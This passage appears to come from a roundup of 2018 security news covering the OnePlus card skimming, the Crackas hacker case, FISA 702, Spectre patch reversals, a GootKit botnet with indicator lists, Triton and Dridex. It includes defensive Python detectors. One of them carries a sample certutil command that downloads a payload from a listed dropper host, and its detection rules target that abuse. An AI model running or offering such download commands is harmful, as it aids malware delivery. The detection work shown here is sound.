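customers report fraud. The sample HTML, the baseline and the marker script
below are constructed for illustration.
"""
import hashlib
import re
from dataclasses import dataclass

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


@dataclass(frozen=True)
class ScriptRef:
    kind: str    # "external" or "inline"
    ident: str   # the src URL, or the sha256 of the inline body


def inventory_scripts(html: str) -> list[ScriptRef]:
    """Return every script on the page as an external src or an inline-body hash.

    Hashing inline bodies (rather than storing them) matches what a CSP
    `script-src 'sha256-...'` allowlist does, so the digests can be reused there.
    """
    found = []
    for attrs, body in SCRIPT_RE.findall(html):
        m = SRC_RE.search(attrs)
        if m:
            found.append(ScriptRef("external", m.group(1)))
        else:
            digest = hashlib.sha256(body.strip().encode()).hexdigest()
            found.append(ScriptRef("inline", digest))
    return found


def unexpected_scripts(html: str, baseline: set[ScriptRef]) -> list[ScriptRef]:
    """Scripts present on the served page that are not in the signed-off baseline."""
    return [s for s in inventory_scripts(html) if s not in baseline]


# Constructed sample: the legitimate checkout page as deployed...
CLEAN_PAGE = """<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
</head><body><form id="pay"><input name="cc"></form></body></html>"""

# ...and the same page after an attacker appended a form-grabbing script
# (the body is only a placeholder marker, it exfiltrates nothing).
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>document.getElementById("pay").addEventListener("submit",'
    'function(){/* exfiltrate fields */});</script></body>',
)

# The baseline is taken from the page as it was reviewed and signed off.
BASELINE = set(inventory_scripts(CLEAN_PAGE))

if __name__ == "__main__":
    for ref in unexpected_scripts(TAMPERED_PAGE, BASELINE):
        print(f"UNEXPECTED {ref.kind} script: {ref.ident}")
```

In practice the check runs against the page as served to an ordinary customer session (the OnePlus script ran "intermittently", so a single fetch from the office network may not see it), and the baseline is refreshed only through the release process.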

OnePlus said that it has quarantined the infected server and enhanced the security of its systems.

Clients that used their saved credit card, PayPal account or the “Credit Card via PayPal” method are not affected by the security breach.

As a precaution, the company is temporarily disabling credit card payments at ; clients can still pay using PayPal. The company said it is currently exploring alternative secure payment options with its service providers.

OnePlus is notifying all possibly affected OnePlus customers via an email.

“We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better,” continues the statement.


Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief
20.1.2018 securityaffairs BigBrothers

British teenager Kane Gamble (15), leader of the ‘Crackas With Attitude’ hacking group gained access to intel operations in Afghanistan and Iran by posing as the CIA chief.
Do you remember “Crackas With Attitude”?

Crackas With Attitude was a hacking crew that claimed a string of high-profile actions in support of the Palestinian cause.

The notorious group is responsible for attacks against US intelligence officials; the list of targeted victims is long and includes James Clapper, Director of National Intelligence under the Obama administration, Homeland Security Secretary Jeh Johnson and CIA director John Brennan.

Cracka is also responsible for the disclosure of personal information of 31,000 government agents, including data of FBI agents, Department of Homeland Security (DHS) officers and DoJ employees.


Cracka used the account “@DotGovz” on Twitter to publish online the sensitive data.

The Crackas With Attitude crew always expressed its support for Palestine; they hacked US Government entities because of US support for Israeli policy.

The group was led by a British teenager, Kane Gamble, who was 15 years old at the time of the hack of the CIA director’s account.

According to prosecutors, Kane Gamble accessed secret data related to intelligence operations in Afghanistan and Iran by pretending to be the head of the CIA.

“He accessed some extremely sensitive accounts referring to, among other things, military operations and intelligence operations in Afghanistan and Iran.” said John Lloyd-Jones QC prosecutor.


Gamble was arrested in February 2016. In October 2017 he pleaded guilty to ten charges related to intrusions that occurred between late 2015 and early 2016.

Two other members of the Crackas With Attitude crew, Andrew Otto Boggs and Justin Gray Liverman, were arrested by the FBI in September 2016 and have already been sentenced to federal prison.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

“It all started by me getting more and more annoyed at how corrupt and cold-blooded the US Government is so I decided to do something about it.” Gamble told a journalist.

“The court heard Gamble “felt particularly strongly” about US-backed Israeli violence against Palestinians, the shooting of black people by US police, racist violence by the KKK and the bombing of civilians in Iraq and Syria.” reported The Sun.

Gamble’s counsel argued that he is on the autism spectrum and that at the time of his offending he had the mental development of a 12 or 13-year-old.

“Medical experts for the defence argue that he is on the autism spectrum and at the time of his offending had the mental development of a 12 or 13-year-old.” reported The Telegraph.

“He has no friends to speak of and is closest to his mother Ann, a cleaner who reportedly won a £1.6million lottery jackpot in 1997 but “lost all the money on doomed property deals”.”

William Harbage QC said that after his arrest Gamble told doctors “it was kind of easy” and that he had little sense of the consequences of his actions, carried out “in his bedroom on the internet thousands of miles away”.

The teenager is awaiting sentencing.


The US Global surveillance bill has been signed by President Trump
20.1.2018 securityaffairs BigBrothers

The US Government missed a historic opportunity to reform a dangerous surveillance law that enables global surveillance; instead it has signed a version that makes it worse.
The reauthorisation of the US surveillance framework was signed by President Trump one day after the Senate passed it by 65 votes to 34. The law will remain in force for another six years. Edward Snowden commented:


Edward Snowden (@Snowden), 7:56 PM - Jan 18, 2018: “65 Senators just voted to expand an unconstitutional law permitting Trump to spy on communications with one leg in the US–without a warrant. For the next six years, any unencrypted internet request that even touches a US border will be "ingested" (intercepted) and parsed by NSA. https://twitter.com/EFF/status/954048766000087041”
Privacy and civil rights advocates have long criticized Section 702 of the Foreign Intelligence Surveillance Act (FISA), which allows US intelligence agencies to conduct surveillance under certain conditions without a warrant.

Section 702 allows the NSA to conduct warrantless surveillance of foreigners located abroad, including their communications with US citizens.


The scale of the surveillance conducted under Section 702 was revealed by NSA whistleblower Edward Snowden in 2013. Civil rights and privacy advocates consider it unconstitutional under the Fourth Amendment.

The bill increases the spying powers of intelligence agencies and blocks safeguards; curiously, it was passed by Republicans who have always criticized the corruption of the Government.

Politicians who voted for Section 702 believe it is crucial to protect Americans from foreign governments and terrorism, and they stressed that the revisions to the bill will protect citizens from abuse.
“There is a glimmer of light. The last few weeks have demonstrated that bipartisan efforts to reform our surveillance laws continue on an arc of progress,” wrote ACLU legislative counsel Neema Singh Guliani in a blog post.

“With only two more votes, reformers could have halted this bill from advancing and forced a floor debate over badly needed improvements. And an effort to pass the most comprehensive Section 702 reform bill introduced in Congress garnered the support of over 180 members in the House. With actual debate, real reform provisions likely would have passed.”

Just hours before the Section 702 reauthorisation was signed by the President, the House intelligence committee approved the release to the rest of Congress of a confidential four-page memo alleging previous abuse of the FISA spying program.

“Scores of Republicans have since viewed the document in a Sensitive Compartmented Information Facility on Capitol Hill. They left expressing shock, saying the special counsel investigation into whether Trump’s campaign officials had improper contacts with Russia is based on politically motivated actions at the highest level of law enforcement.” reported The Hill.

House Freedom Caucus Chairman Mark Meadows (R-N.C.) called the memo “shocking.”

“I’m here to tell all of America tonight that I’m shocked to read exactly what has taken place,” Meadows (R-N.C.) said in a speech on the House floor.

“I thought it could never happen in a country that loves freedom and democracy like this country. It is time that we become transparent with all of this, and I’m calling on our leadership to make this available so all Americans can judge for themselves.”

Politicians who have read the memo describe its contents as “worse than Watergate.”

In conclusion, this is a black page in the history of Americans. The six-year extension of the law that allows the US government to monitor foreigners’ communications abroad without a warrant has been approved. Moreover, US intelligence will also be able to spy on American citizens, politicians, businessmen and journalists who communicate with them, despite the Fourth Amendment.


Red Hat reverts Spectre (CVE-2017-5715) security updates due to boot issues reported by customers
20.1.2018 securityaffairs

Red Hat is going to release updates that are reverting previous patches for the Spectre vulnerability (Variant 2, aka CVE-2017-5715).
Just after the release of the Spectre and Meltdown patches, many experts reported a significant impact on the performance and stability of the systems running them.

While Meltdown and Spectre Variant 1 can in principle be addressed by patching the OS, Spectre Variant 2 requires a firmware/microcode update to address the issue.

Red Hat has now joined the list of companies that observed problems after the installation of the patches: it is releasing updates that revert its previous patches for the Spectre vulnerability (Variant 2, aka CVE-2017-5715).

The company decided to revert the initial security updates after receiving complaints from some customers that their systems failed to boot.

Red Hat is recommending that customers contact their OEM hardware provider to obtain the latest firmware release that mitigates CVE-2017-5715.

“Red Hat Security is currently recommending that subscribers contact their CPU OEM vendor to download the latest microcode/firmware for their processor.” reads the advisory published by Red Hat.

“The latest microcode_ctl and linux-firmware packages from Red Hat do not include resolutions to the CVE-2017-5715 (variant 2) exploit. Red Hat is no longer providing microcode to address Spectre, variant 2, due to instabilities introduced that are causing customer systems to not boot. The latest microcode_ctl and linux-firmware packages are reverting these unstable microprocessor firmware changes to versions that were known to be stable and well tested, released prior to the Spectre/Meltdown embargo lift date on Jan 3rd. Customers are advised to contact their silicon vendor to get the latest microcode for their particular processor.”


Other distributions based on Red Hat Enterprise Linux, such as CentOS, could suffer similar problems, and it may be necessary to revert the Spectre Variant 2 security updates there as well.

The company advises customers to use the Red Hat Customer Portal Lab App to verify that their systems have the microprocessor firmware needed to address CVE-2017-5715 (variant 2):

Red Hat Customer Portal Labs – Spectre And Meltdown Detector
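For admins who want the same check without the portal, the two facts worth collecting per host are the microcode revision the kernel reports for each logical CPU (in /proc/cpuinfo) and the kernel’s own spectre_v2 verdict (in /sys/devices/system/cpu/vulnerabilities/, a directory that exists only on kernels carrying the Spectre/Meltdown patches). The script below is an added example and is not Red Hat’s detector; the paths are the standard kernel ones, the sample file contents are constructed, and the "expected minimum revision" is an input you take from your silicon vendor’s guidance for the specific CPU model, not something the script can derive:

```python
"""Collect the Spectre v2 (CVE-2017-5715) state of a Linux host.

Added example, not Red Hat's detector script. Two sources are read: the
per-CPU microcode revision in /proc/cpuinfo and the kernel verdict in
/sys/devices/system/cpu/vulnerabilities/spectre_v2 (absent on kernels that
predate the mitigation patches). The sample texts below are constructed.
"""
import re
from pathlib import Path
from typing import Optional

CPUINFO = Path("/proc/cpuinfo")
SPECTRE_V2 = Path("/sys/devices/system/cpu/vulnerabilities/spectre_v2")

MICROCODE_RE = re.compile(r"^microcode\s*:\s*(0x[0-9a-fA-F]+)", re.MULTILINE)


def microcode_revisions(cpuinfo_text: str) -> set[int]:
    """Distinct microcode revisions reported across all logical CPUs.

    More than one value after a firmware/microcode_ctl update usually means the
    new image was not applied on every core yet and a reboot is still pending.
    """
    return {int(rev, 16) for rev in MICROCODE_RE.findall(cpuinfo_text)}


def spectre_v2_status(sysfs_text: Optional[str]) -> str:
    """Classify the kernel's spectre_v2 line as 'mitigated', 'vulnerable' or 'unknown'."""
    if sysfs_text is None:
        return "unknown"          # kernel has no vulnerabilities/ directory at all
    line = sysfs_text.strip().lower()
    if line.startswith("vulnerable"):
        return "vulnerable"
    if line.startswith("mitigation:") or line == "not affected":
        return "mitigated"
    return "unknown"


def assess(cpuinfo_text: str, sysfs_text: Optional[str],
           expected_min_rev: Optional[int] = None) -> dict:
    """Combine both sources into one report.

    expected_min_rev is the fixed microcode revision for this CPU model, taken
    from the silicon vendor's guidance (an assumption supplied by the caller).
    """
    revs = microcode_revisions(cpuinfo_text)
    report = {
        "microcode": sorted(hex(r) for r in revs),
        "reboot_pending": len(revs) > 1,
        "spectre_v2": spectre_v2_status(sysfs_text),
    }
    if expected_min_rev is not None and revs:
        # The oldest revision on any core is what the host is really running on.
        report["microcode_current"] = min(revs) >= expected_min_rev
    return report


def assess_host(expected_min_rev: Optional[int] = None) -> dict:
    """Run the assessment against the live system (Linux only)."""
    sysfs = SPECTRE_V2.read_text() if SPECTRE_V2.exists() else None
    return assess(CPUINFO.read_text(), sysfs, expected_min_rev)


# Constructed sample: two logical CPUs, one still on the older microcode.
SAMPLE_CPUINFO = """processor\t: 0
model name\t: Example CPU
microcode\t: 0x3a
processor\t: 1
model name\t: Example CPU
microcode\t: 0x3c
"""
SAMPLE_SYSFS = "Mitigation: Full generic retpoline\n"

if __name__ == "__main__":
    print(assess(SAMPLE_CPUINFO, SAMPLE_SYSFS, expected_min_rev=0x3c))
```

Note that after the reverted microcode_ctl package described above, a host can legitimately show a revision older than the vendor’s fixed one and still report a kernel-side retpoline mitigation; the two fields are reported separately for exactly that reason.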


Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet
20.1.2018 securityaffairs BotNet

Threat actors with a deep knowledge of the Italian fiscal ecosystem are using a huge botnet to target Italian companies and the Ministry of the Interior.
On January 18 a colleague of mine (Luca) called me to tell me that a malicious email was targeting Italian companies. This was the beginning of a new analysis adventure that Luca and I ran together.

The email pretended to be sent by the “Ministero dell’ Economia e delle Finanze”, the Italian Department of Treasury, and it used well-chosen subjects such as:

Codici Tributo Acconti
F24 Acconti-Codice Tributo 4034
The attacker knows the Italian fiscal calendar very well: those forms are in heavy use by company administration staff at that time of year, so this lure lets the attacker reach as many companies as possible. The email did not come from the “Ministero dell’ economia e delle Finanze” at all; it came from the following addresses:

info@amber-kate.com
info@fallriverproductions.com
The email looked like this:

Figure: the malicious email
A simple link pointing to a high-reputation domain opened the default browser and downloaded the following JavaScript file. The heavy obfuscation and the way the content was delivered were suspicious enough to be worth following up.


Infection: Stage 1 Obfuscated
After deobfuscation the JavaScript was much easier for a human to read.


Infection: Stage 1 Clear Text
A classic “drop and execute” routine followed. A GET request to 239outdoors.com/themes5.php dropped a file named 1t.exe, and the same script then executed the dropped file. Once running on the victim machine, 1t.exe contacted the command and control server and waited for further commands.

The sample looks like GootKit, a well-known banking trojan. The malware installs itself, contacts the command and control server asking “what to do” and sends the stolen credentials directly to that server. Details on IPs, persistence and so on are provided in the IoC section, but today we won’t describe GootKit: we got access to the dropping site!

We wanted to find out whether we could help victims deactivate the malicious botnet by providing as many details as possible, without focusing on reversing the malware itself, since it appears to be already known.

By analyzing the dropping website further we immediately saw that the same URL was dropping another threat. The parallel threat the dropping website was spreading was called “Nuovo Documento 2008”, and it was a .bat file, as follows.


New Threat Stage 1
On its first stage that .bat file opens a browser pointing to a legitimate image, but later on it uses a well-known technique, “certutil for delivery of file”, to drop and execute another file. The technique is described here by carnal0wnage. Basically, the attacker uses the certutil.exe program to download a Base64-encoded payload, decode it and run it. The technique is very quiet, since the user agent of certutil.exe is not suspicious in itself: it legitimately needs to connect outside the company network to check certificates, so few IPS rules fire on it. The dropped file, unslss.exe, appears to be very close to the previously analyzed one (1t.exe): it contacts the same C&C and behaves in a similar way. But again, we won’t focus on reversing the malware; rather, we want to collect as many IoCs as possible to protect as many victims as possible.

By analyzing the dropping website we found that a significant number of connections carried additional referrers, so we focused our attention on how many DNS names were pointing to that domain. The result was quite impressive (please see the Dropping URLs IoC section).
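The certutil download-and-decode chain described above is noisy in a different place than the network: process-creation telemetry. Two switches give it away, -urlcache together with a URL (the download) and -decode (the Base64 decode of the fetched file), and the dropper URL itself can be matched against the indicator list later in this post. The code below is an added example and is not the authors’ tooling; it runs over simplified process-creation records (the shape of a Sysmon event ID 1 or Windows 4688 record, constructed here), uses two indicators taken from the post’s IoC section, and everything else in the sample events is constructed:

```python
"""Flag certutil.exe used as a downloader/decoder, plus hits on the post's IoCs.

Added example, not the authors' tooling. Input is a list of simplified
process-creation records (constructed here); two rules are applied:
  certutil_download / certutil_decode  - the switches the technique needs
  ioc_domain                           - a URL host that matches the IoC list
"""
import re
import shlex
from dataclasses import dataclass

# Indicators copied from the post's IoC section (dropper host and C&C address).
IOC_DOMAINS = {"239outdoors.com", "185.44.105.97", "185.61.152.71"}

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str = ""


@dataclass
class Finding:
    rule: str
    event: ProcessEvent
    detail: str = ""


def _args(cmd: str) -> list[str]:
    """Tokenise a Windows command line; posix=False keeps backslashes intact."""
    try:
        return [a.strip('"').lower() for a in shlex.split(cmd, posix=False)]
    except ValueError:
        return cmd.lower().split()


def detect_certutil_abuse(ev: ProcessEvent) -> list[Finding]:
    findings = []
    if not ev.image.lower().endswith("certutil.exe"):
        return findings
    args = _args(ev.command_line)
    if "-urlcache" in args and any(a.startswith(("http://", "https://")) for a in args):
        findings.append(Finding("certutil_download", ev, "-urlcache with a URL"))
    if "-decode" in args:
        findings.append(Finding("certutil_decode", ev, "-decode of a local file"))
    return findings


def detect_ioc_hits(ev: ProcessEvent) -> list[Finding]:
    """Any URL host in the command line (port stripped) that is on the IoC list."""
    hosts = {h.lower().split(":")[0] for h in URL_RE.findall(ev.command_line)}
    return [Finding("ioc_domain", ev, h) for h in sorted(hosts & IOC_DOMAINS)]


def scan(events: list[ProcessEvent]) -> list[Finding]:
    out = []
    for ev in events:
        out.extend(detect_certutil_abuse(ev))
        out.extend(detect_ioc_hits(ev))
    return out


# Constructed sample events: one legitimate use, then the download+decode chain.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -verify cert.cer",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 'certutil.exe -urlcache -split -f "http://239outdoors.com/themes5.php" pic.txt',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -decode pic.txt unslss.exe",
                 r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:18} {f.detail:28} {f.event.command_line}")
```

The parent image is carried along because a certutil.exe spawned by cmd.exe out of a batch file, as here, is a much stronger signal than one spawned by a management agent; adding that condition to the rule is the obvious next tuning step.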

Following the research on the dropping website, we found an interesting log of all the connections coming from possible victims. We collected that log and built the following list of possible infections (possible victims). We won’t publish the victims’ IP addresses, but if you can prove you are authorized by your company to request those logs we will give you (for free, of course) the IP addresses we found related to your company. A list of possibly infected networks follows.

Possible Victims:

ACI informatica s.p.a.
AGOS-AS
AGSM Verona Spa
ASGARR Consortium GARR
Acantho S.p.a
Alfanews S.r.l.
Ambrogio s.r.l.
Asco TLC S.p.A.
Autostrade-as
BT Italia
BT Italia S.p.A.
Banca Monte Dei Paschi Di Siena S.P.A.
Brennercom S.p.A.
COLT Technology Services Group Limited
Camera dei deputati
Cesena Net srl
Clouditalia Telecomunicazioni S.p.A.
Comune Di Brescia
Comune di Bologna
Consortium GARR
Consorzio per il Sistema Informativo
Costacrociere-as
Duebite-as
E4A s.r.l.
Energente S.r.l.
FASTNET SpA
FASTWEB SPA
FINECO Banca del Gruppo Unicredit
Fastweb
Forcepoint Cloud Ltd
GenyCommunications
Global Com Basilicata s.r.l.
H3G Italy
Hynet S.R.L.
IBSNAZ
ICT Valle Umbra s.r.l.
InAsset S.r.l.
InfoCamere SCpA
Infracom Italia S.p.A.
Inrete s.r.l
Insiel- Informatica per il sistema degli enti loca
Integrys.it di Stefania Peragna impresa individual
Intred S.p.A.
KPNQWest Italia S.p.a.
LEPIDA
Lepida S.p.A.
Liguria Digitale S.C.p.A.
Linea Com S R L
Linkem spa
Lombardia Informatica S.p.A.
Mandarin S.p.A.
Mc-link SpA
Metrolink S.R.L.
Ministero dell’Interno
Mnet srl
NGI SpA
Nemo S.r.l.
Nordcom S.p.a.
Officine Informatiche Srl
Progetto Evo S.r.l.
Provincia di Reggio nell’Emilia
Qcom spa
Raiffeisen OnLine GmbH
Regione Basilicata
Regione Toscana
Regione Veneto
STI ADSL
Sardegnait-as
Societa’ Gestione Servizi Bp S.p.A.
TELEX S.r.l.
TWT S.p.A.
Telecom Italia
Terra S.p.a.
Time-net S.r.l.
Tiscali SpA
Trenitalia SpA
Trentino Network S.r.l.
Universita’ degli Studi di Milano
Venis S.p.A.
Videotime SPA
Vodafone Group Services GmbH
Vodafone Italia DSL
Vodafone Omnitel B.V.
Vodafone Omnitel N.v.
WIIT S.p.A.
Welcome Italia S.p.A
Wind Telecomunicazioni
Wind Telecomunicazioni SpA
Below are the IoCs collected during this long “analysis journey”. I ran this analysis overnight, so I am sure there are some imprecisions, but I preferred to speed up the whole process to give everyone the chance to block this infamous threat as soon as possible.

Hope it helps the community.

IoC:

Email:
info@amber-kate.com
info@fallriverproductions.com
Dropping URLs:
185.61.152.71
239outdoors.com
bentlabel.com
cdvdautomator.com
cloudblueprintprogram.com
cnchalftone.com
comedyyall.com
conticellolaw.com
couplesdoingbusiness.com
dvoper.com
equinnex.com
ericandchrissy.com
evelynleekley.com
expungementstennessee.com
flaveme.com
grkisland.com
healingfoodconsulting.com
hertzsynergy.com
hollywoodisruption.com
home-sphere.com
integrativenutritiontherapy.com
jdkanyuk.com
kineloveclips.com
kylesinger.com
legionchristmas.com
menshoesonlinestore.com
microtiasurgery.com
movielotbar.com
muiienweg.com
niarhoslondon.com
opsantorinitours.com
progunjobs.com
rocketpak.com
scottishwindowsolutions.com
silkygames.com
snapshotsandwhatnots.com
snotterkind.com
solespin.com
strangerthanchristmas.com
synchronr.com
taramadden.com
terento.website
theargumint.com
thegildedwren.com
thejourneytogodsheart.com
thesaltybody.com
topsantorinitours.com
tuftandneedles.com
videospanishlessons.com
vovachka.com
wall-runners.com
war-arena.com
www.scottishwindowsolutions.com
z1logistics.com
zayantetinyhomes.com
zefeed.com
Command and Control servers:
185.44.105.97
ns15.dreamsinthesun.com
bdi2.nomadicdecorator.com
elis.k9redemptionrescue.com
api.hailstorm360.com
cerera.survivalbid.com
mark.k9redemptionrescue.org
nsc.dayswithsunrays.com
at.moonbeammagic.com
ssl.vci-cfo.com
sip3.propertiesandprojects.com
host1.jodiray.com
note.lawrencechoy.com
note.lawrencechoy.com:80
185.44.105.97:80/200
Hashes:
63d6927881d4978da4e162c17d82e9c009d0a93e
7ea33f51b6c4aa54beee7fd878886339c22d2232
8cae0dc9255978a35cfd8db64cbe80001400de9b
839ff9f4c3980ac67d4cbef296520ee364a0911f


Triton Malware exploited a Zero-Day flaw in Schneider Triconex SIS controllers
20.1.2018 securityaffairs Virus

The industrial giant Schneider discovered that the Triton malware exploited a zero-day vulnerability in Triconex Safety Instrumented System (SIS) controllers in an attack aimed at a critical infrastructure organization.
In December 2017, a new malicious code dubbed Triton (aka Trisis) was discovered by researchers at FireEye; it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.


The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

TRITON communicates using the proprietary TriStation protocol, which is not publicly documented; this suggests that the attackers reverse engineered the protocol to carry out the attack.

Schneider’s initial analysis concluded that the attackers had not leveraged any vulnerability in the targeted products, but the vendor has now discovered that the Triton malware exploited a flaw in older versions of the Triconex Tricon system.

Schneider confirmed the presence of the flaw only in a small number of older versions and plans to release security updates that address it in the coming weeks.

Schneider also announced that it is developing an application that detects the presence of the malware on a controller and removes it.

Schneider nevertheless pointed out that the root cause of the Triton malware’s success is that the victims failed to implement best practices and security procedures.

Just after the disclosure of the attack, Schneider published a security advisory to warn its customers and recommended not leaving the front panel key switch in “Program” mode when the controller is not being configured: the malicious code can only deliver its payload if the key switch is set to this mode.

“Schneider Electric is aware of a directed incident targeting a single customer’s Triconex Tricon safety shutdown system. We are working closely with our customer, independent cybersecurity organizations and ICSCERT to investigate and mitigate the risks of this type of attack.” reads the security advisory.

“The modules of this malware are designed to disrupt Triconex safety controllers, which are used widely in critical infrastructure. The malware requires the keyswitch to be in the “PROGRAM” mode in order to deliver its payload. Among others, the reported malware has the capability to scan and map the industrial control system environment to provide reconnaissance and issue commands directly to Tricon safety controllers.”

Schneider advised customers to implement the instructions in the “Security Considerations” section of the Triconex documentation.


OnePlus confirms up to 40,000 customers affected by Credit Card Breach
20.1.2018 thehackernews  Incident

OnePlus has finally confirmed that its online payment system was breached, following several complaints of fraudulent credit card transactions from its customers who made purchases on the company's official website.
In a statement released today, the Chinese smartphone manufacturer admitted that credit card information belonging to up to 40,000 customers was stolen by an unknown hacker between mid-November 2017 and January 11, 2018.
According to the company, the attacker targeted one of its systems and injected a malicious script into the payment page code in an effort to sniff out credit card information while it was being entered by the users on the site for making payments.
The malicious script was able to capture full credit card information, including their card numbers, expiry dates, and security codes, directly from a customer’s browser window.
"The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated," OnePlus said on its official forum. "We have quarantined the infected server and reinforced all relevant system structures."
However, the company believes users who shopped on its website using their saved credit card, PayPal account or the "Credit Card via PayPal" method are not affected by the breach.
OnePlus is still investigating the incident and committed to conducting an in-depth security audit to identify how hackers successfully managed to inject the malicious script into its servers.
Meanwhile, credit card payments will remain disabled on the OnePlus.net store until the investigation is complete as a precaution, though users can make purchases through PayPal.
"We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better," OnePlus says.
OnePlus is notifying all possibly affected customers via email and advises them to keep a close eye on their bank account statements for any fraudulent charges or to look into cancelling their payment card.
The company is also looking into offering a one-year subscription of credit monitoring service for free to all affected customers.


Man Admits to DDoS-ing Employers, Competitors
19.1.2018 securityweek Crime
A New Mexico man admitted in court this week to launching distributed denial of service (DDoS) attacks against the websites of former employers, business competitors, and public services.

The culprit, John Kelsey Gammell, 55, pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States from at least July 2015 through March 2017. He also pleaded guilty to two counts of being a felon in possession of a firearm.

The DDoS attacks were aimed at numerous websites, including domains operated by companies Gammell used to work for or that had declined to hire him. He also targeted competitors of his business and websites of law enforcement agencies and courts, among others.

Gammell admitted to using programs on his own computers and to purchasing the services of “DDoS-for-hire” companies to launch the DDoS attacks. He purchased the services of companies such as VDoS, CStress, Inboot, Booter.xyz and IPStresser, the Department of Justice reveals.

Victims included Washburn Computer Group, the Minnesota State Courts, Dakota County Technical College, Minneapolis Community and Technical College and the Hennepin County Sheriff’s Office, among others.

To avoid detection, he used IP address anonymization services, paid for the DDoS-for-hire services using cryptocurrency, used spoofed emails to conceal his conduct, and employed encryption and drive-cleaning tools to conceal digital evidence. To circumvent his victims’ DDoS attack mitigation efforts, Gammell amplified his attacks by using multiple DDoS-for-hire services at once.

Gammell is a convicted felon prohibited from possessing firearms or ammunition. He also admitted to possessing multiple firearms, ammunition, and parts for use in building firearms and ammunition. Sentencing is scheduled for a later date.


Dridex Campaign Abuses FTP Servers
19.1.2018 securityweek Virus
A recently observed email campaign is abusing compromised FTP servers as download locations for malicious documents and infecting users with the Dridex banking Trojan, Forcepoint has discovered.

Dridex has been one of the most prolific banking Trojans over the past several years, with the actors behind it constantly adopting new techniques and improving their malware for increased efficiency. The malware is focused on stealing users’ online banking credentials to perform financial fraud.

Malicious emails distributed as part of the new campaign were observed on January 17, 2018, primarily sent to .com top level domains (TLDs). Analysis of the top affected TLDs revealed that the major regional targets were France, the UK, and Australia.

The emails were sent from compromised accounts, where the sender names were rotated around a list of names, in an attempt to make the emails look more convincing to unsuspecting recipients, Forcepoint reveals.

The malicious actor(s) behind the attack used two types of malicious documents as delivery mechanisms, namely a Word document abusing Dynamic Data Exchange (DDE) for malware execution, and an XLS file with macro code to fetch the banking Trojan.

The compromised servers abused in this campaign don’t appear to be running the same FTP software, and the security researchers believe that the attackers obtained the login credentials as part of other attacks.

“The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable,” Forcepoint notes.

The emails sent in this campaign appear to come from the Necurs botnet, currently considered the largest spam botnet out there. The domains used for distribution were associated with other Necurs campaigns and the document downloaders are similar to those used by the botnet before. Furthermore, Necurs is known to have distributed Dridex for a long time.

What Forcepoint noticed regarding this campaign, however, was that the spam volume was very low compared to typical Necurs campaigns. Only around 9,500 emails were observed in this attack, while normal Necurs campaigns involve millions of emails. The use of FTP servers for download is also new.

“Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords,” Forcepoint notes.
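The detail that makes this campaign easy to triage is the one Forcepoint highlights: the lure links are ftp:// URLs with the compromised server’s credentials written into them. A mail-gateway or SOC rule can match that shape directly, parsing every FTP URL in a message and reporting the ones whose authority part carries a user:password pair and whose target is an Office document. The code below is an added example, not Forcepoint’s analysis code; the message bodies are constructed and nothing is fetched:

```python
"""Find ftp:// links that embed credentials in message bodies.

Added example, not Forcepoint's code. Parses every ftp/ftps URL in a message,
separates out the credential-bearing parts, flags the suspicious subset
(credentials present and an Office document as the target) and can redact the
credentials so the indicator can be shared. Sample bodies are constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

FTP_URL_RE = re.compile(r"\bftps?://[^\s<>\"']+", re.IGNORECASE)
DOC_EXT = (".doc", ".docx", ".xls", ".xlsx", ".rtf")


@dataclass(frozen=True)
class FtpLink:
    host: str
    username: Optional[str]
    has_password: bool
    path: str


def ftp_links(text: str) -> list[FtpLink]:
    """Every ftp/ftps URL in the text, with its credential parts separated out."""
    links = []
    for raw in FTP_URL_RE.findall(text):
        u = urlsplit(raw.rstrip(".,;)"))   # trailing sentence punctuation is not part of the URL
        if not u.hostname:
            continue
        links.append(FtpLink(u.hostname.lower(), u.username, u.password is not None, u.path))
    return links


def credentialed_doc_links(text: str) -> list[FtpLink]:
    """The suspicious subset: user and password in the URL, Office document as target."""
    return [link for link in ftp_links(text)
            if link.username and link.has_password and link.path.lower().endswith(DOC_EXT)]


def redact(text: str) -> str:
    """Replace user:pass@ in ftp URLs so the indicator can be shared without the secret."""
    return re.sub(r"(ftps?://)[^/\s@]+@", r"\1[REDACTED]@", text, flags=re.IGNORECASE)


# Constructed sample messages: one lure, one benign anonymous FTP, one user without password.
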